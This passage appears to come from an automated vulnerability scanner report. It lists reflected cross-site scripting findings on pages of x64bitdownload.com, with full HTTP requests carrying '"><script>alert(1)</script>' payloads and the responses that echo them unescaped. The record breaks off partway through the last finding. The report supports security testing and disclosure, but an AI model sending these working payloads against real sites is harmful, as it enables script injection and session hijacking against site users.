Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1c3"><script>alert(1)</script>79bc88e940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940" />
...[SNIP]...

4.1596. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3709f"><script>alert(1)</script>5d317c2536e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1" />
...[SNIP]...

4.1597. http://www.x64bitdownload.com/64-bit-rss-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d337e"><script>alert(1)</script>9b144cad06d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d" />
...[SNIP]...

4.1598. http://www.x64bitdownload.com/64-bit-rss-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a417"><script>alert(1)</script>14bc0d3550a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1" />
...[SNIP]...

4.1599. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d26"><script>alert(1)</script>9a97b43768b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b" />
...[SNIP]...

4.1600. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12de"><script>alert(1)</script>770277e5ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1" />
...[SNIP]...

4.1601. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2159a"><script>alert(1)</script>7cc8e154fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6" />
...[SNIP]...

4.1602. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02c9"><script>alert(1)</script>494377cbd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1" />
...[SNIP]...

4.1603. http://www.x64bitdownload.com/64-bit-search-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19f4"><script>alert(1)</script>42c8e9318d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8" />
...[SNIP]...

4.1604. http://www.x64bitdownload.com/64-bit-search-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf0d"><script>alert(1)</script>f1422490e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1" />
...[SNIP]...

4.1605. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 378a5"><script>alert(1)</script>edb593753a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9" />
...[SNIP]...

4.1606. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d45f"><script>alert(1)</script>fb73e15ccb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1" />
...[SNIP]...

4.1607. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42925"><script>alert(1)</script>83516ad106d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d" />
...[SNIP]...

4.1608. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa26d"><script>alert(1)</script>59dfdd435a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1" />
...[SNIP]...

4.1609. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d90"><script>alert(1)</script>34e92339c0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1" />
...[SNIP]...

4.1610. http://www.x64bitdownload.com/64-bit-troll-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d4c"><script>alert(1)</script>b3d1287dd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1 HTTP/1.1
